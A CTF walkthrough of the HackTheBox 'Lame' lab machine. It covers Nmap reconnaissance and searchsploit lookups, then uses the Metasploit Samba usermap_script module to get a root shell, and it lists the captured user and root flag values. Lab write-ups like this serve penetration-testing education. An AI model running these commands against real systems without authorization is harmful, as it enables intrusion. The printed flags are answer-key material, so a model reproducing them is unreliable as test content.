HackTheBox Lame CTF Walkthrough

4 min read CTF Walkthroughs HACKTHEBOX
HackTheBox Lame CTF Walkthrough

This walkthrough demonstrates the full exploitation process for the Lame machine on HackTheBox, from initial reconnaissance to gaining root access, along with key lessons learned.

1. Initial Reconnaissance

The first step in any CTF is to identify open services on the target machine. We used Nmap for a full TCP port scan with service detection and default script scanning:

sudo nmap -sS -sV -sC -p- 10.129.145.147 -oN nmap_full_scan

Nmap Scan Results:

  • 21/tcp (FTP) – vsftpd 2.3.4 (Anonymous login allowed)

  • 22/tcp (SSH) – OpenSSH 4.7p1

  • 139/tcp & 445/tcp (Samba) – smbd 3.0.20-Debian, workgroup: WORKGROUP

  • 3632/tcp (distccd) – distccd v1

Key observations:

  • FTP allows anonymous login, but initial exploration did not reveal sensitive files.

  • Samba is running a vulnerable version (3.0.20), which could be exploited.

  • vsftpd 2.3.4 is known for a backdoor vulnerability in older versions.

Service enumeration also revealed general system info: Unix/Linux OS, hostname lame, domain hackthebox.gr.

2. Service Vulnerability Analysis

FTP: vsftpd 2.3.4

Searching for exploits:

searchsploit vsftpd 2.3.4

Results showed the infamous backdoor command execution, but attempts with Metasploit failed. This illustrates an important lesson: the presence of a known vulnerable service does not guarantee it is the intended attack vector.

Samba: 3.0.20

We also examined Samba exploits:

searchsploit samba 3.0.20

Relevant exploit: Samba 'Username map script' Command Execution. This version was vulnerable to remote code execution using the Metasploit usermap_script module.

3. Exploiting Samba via Metasploit

Open Metasploit:

msf6 > use exploit/multi/samba/usermap_script

2. Configure the module options:

set RHOSTS 10.129.145.147
set LHOST 10.10.14.62
set LPORT 5555

  1. Launch the exploit:

exploit

4. Successful exploitation resulted in a root shell:

[*] Command shell session 1 opened
id
uid=0(root) gid=0(root)

4. Capturing Flags

User Flag

Navigating to /home/makis:

cd /home/makis
cat user.txt

Result: bf43559a3fed24e30fe5cbfdafef3c67

Root Flag

From the root shell:

cd /root
cat root.txt

Result: 09a885cf7c8bfbd4d21cbffe69eef798

Both flags were successfully obtained, completing the machine.

5. Lessons Learned

  1. Do not assume the easiest path – Seeing FTP vsftpd 2.3.4 immediately suggested using that exploit, but the actual attack vector was Samba. Premature assumptions can waste time.

  2. Samba version is critical – Exploiting Samba required careful attention to the version number and selecting the correct module. Traditional enumeration tools like smbclient or enum4linux might show shares or users but may not reveal the exploit path.

  3. Recon and verification – Always verify service versions and explore multiple vectors rather than focusing on a single “obvious” vulnerability.

Summary

  • Reconnaissance: Nmap scan revealed FTP, SSH, Samba, and distccd services.

  • Service enumeration: FTP and Samba were considered for exploitation.

  • Exploitation: vsftpd exploit failed; Samba usermap_script Metasploit module provided a root shell.

  • Flags captured:

    • User: /home/makis/user.txt

    • Root: /root/root.txt

  • Key Takeaways: Verify service versions, explore multiple vectors, and avoid assumptions.

The Lame machine demonstrates that older services may appear vulnerable, but careful analysis and version-specific exploits are crucial for success.

Written by

jason

Views: 0 Updated: Aug 25, 2025

Related Articles

Dhanush VulnHub CTF Walkthrough

3 min read
Read Article
MinU v2 VulnHub Walkthrough: Full CTF Guide

9 min read
Read Article
Symfonos 4 Vulnhub Walkthrough

14 min read
Read Article

Comments

Leave a Comment

No comments yet. Be the first to comment!